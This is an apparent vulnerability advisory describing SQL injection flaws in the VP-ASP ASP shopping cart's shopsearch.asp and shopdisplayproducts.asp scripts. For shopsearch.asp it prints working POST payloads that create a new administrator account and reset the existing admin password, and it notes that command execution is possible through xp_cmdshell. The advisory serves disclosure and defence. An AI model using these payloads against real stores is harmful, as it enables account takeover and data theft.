Virtual Programming VP-ASP is "a shopping cart application for e-commerce enabled sites. It is written in ASP, supports the following databases: Access, MSSQL, MySQL on Windows and MySQL on UNIX".
VP-ASP suffers from SQL injection vulnerabilities, which may allow an attacker in some cases to gain administrative access to the installed VP-ASP Shopping Cart software or execute arbitrary commands on a target's system.
Vulnerability 1: SQL Injection Vulnerability in 'shopsearch.asp' Script
An SQL Injection vulnerability has been found in the shopsearch.asp script. User supplied input is not filtered before being used in a SQL query. Consequently, query modification using malformed input is possible. Exploitation of the vulnerability allows a remote attacker to insert a new user with administrative privileges. A more sophisticated exploitation would allow a remote attacker to execute arbitrary commands on a target's system (via MSSQL xp_cmdshell() function for example).
Exploit:
Platform: Win32/MSSQL
Posting this data to shopsearch.asp creates new administrative account: Keyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Posting this data to shopsearch.asp changes admin password Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Vulnerability 2: SQL Injection Vulnerability in 'shopdisplayproducts.asp' Script
An SQL Injection vulnerability has been found in the shopdisplayproducts.asp script. Exploitation of the vulnerability will allow remote attacker to read any information from a database.
